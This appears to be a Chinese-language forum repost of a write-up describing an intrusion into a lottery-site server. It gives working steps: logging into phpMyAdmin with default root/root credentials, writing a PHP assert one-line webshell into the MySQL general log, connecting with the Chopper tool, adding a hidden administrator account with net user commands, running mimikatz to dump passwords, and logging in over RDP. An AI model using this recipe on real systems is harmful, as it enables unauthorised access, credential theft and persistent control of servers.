跳转到帖子

渗透系列之打击彩票站

recommended_posts

发布于
  • Members

获取phpmyadmin弱口令

通过信息收集到彩票站点的ip为xxx,探测扫描发现存在phpmyadmin,通过猜测,使用默认弱口令(root/root)登入到phpmyadmin当中。

图片

图片

通过phpmyadmin后台sql查询写入shell到日志文件

使用phpmyadmin的sql查询功能将一句话木马写入到日志文件当中。

流程和命令如下:

1、开启日志功能:set global general_log=on;

2、点击phpmyadmin变量查看日志文件名字:

图片

这里的日志文件是test.php。

3、执行SQL命令写入一句话到日志文件: SELECT'<?php assert($_POST["test"]);?>';

图片

4、执行成功返回。

图片

5、查看日志文件。

图片

6、菜刀连接添加用户并且上传mimikatz。

使用菜刀连接日志文件木马,xxx/test.php 密码:test

图片


查看发现是系统管理员sysytem权限,直接添加用户且添加到管理组即可。

命令为: C:\Windows\system32\net.exe user Test Test!@#123 /add

C:\Windows\system32\net.exe  localgroup administrators Test /add

上传mimikataz到服务器当中。

图片


7、3389连接,读取管理员密码。

(1)、直接telnet ip 3389 测试发现可通,于是直接连接3389进去。

图片

(2)、或者这里在菜刀上执行以下命令查询3389开放的端口也一样。

第一步: tasklist /svc | findstr TermService 查询远程桌面服务的进程

第二步: netstat -ano | findstr ****  //查看远程桌面服务进程号对应的端口号。

(3)、执行mimikatz,读取到管理员组登录密码。

图片

(4)、使用获取的administrator/xxxx账户密码远程登入服务器当中。

图片

发现该服务器使用phpmystudy批量建立彩票站,大概有十几个站点,随意访问几个服务器上的网站域名,部分截图如下:

系统一:

图片


系统二:

图片

系统三:

图片


后台一:

图片

后台二:

图片




转自于原文链接: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247487003&idx=1&sn=5c85b34ce6ffb400fdf858737e34df3d&chksm=ce67a482f9102d9405e838f34479dc8d1c6b793d3b6d4f40d9b3cec9cc87f14555d865cb3ddc&scene=21#wechat_redirect

https://blog.csdn.net/weixin_39997829/article/details/109186917
  • 查看数 726
  • 已创建
  • 最后回复

参与讨论

你可立刻发布并稍后注册。 如果你有帐户,立刻登录发布帖子。

游客
回帖…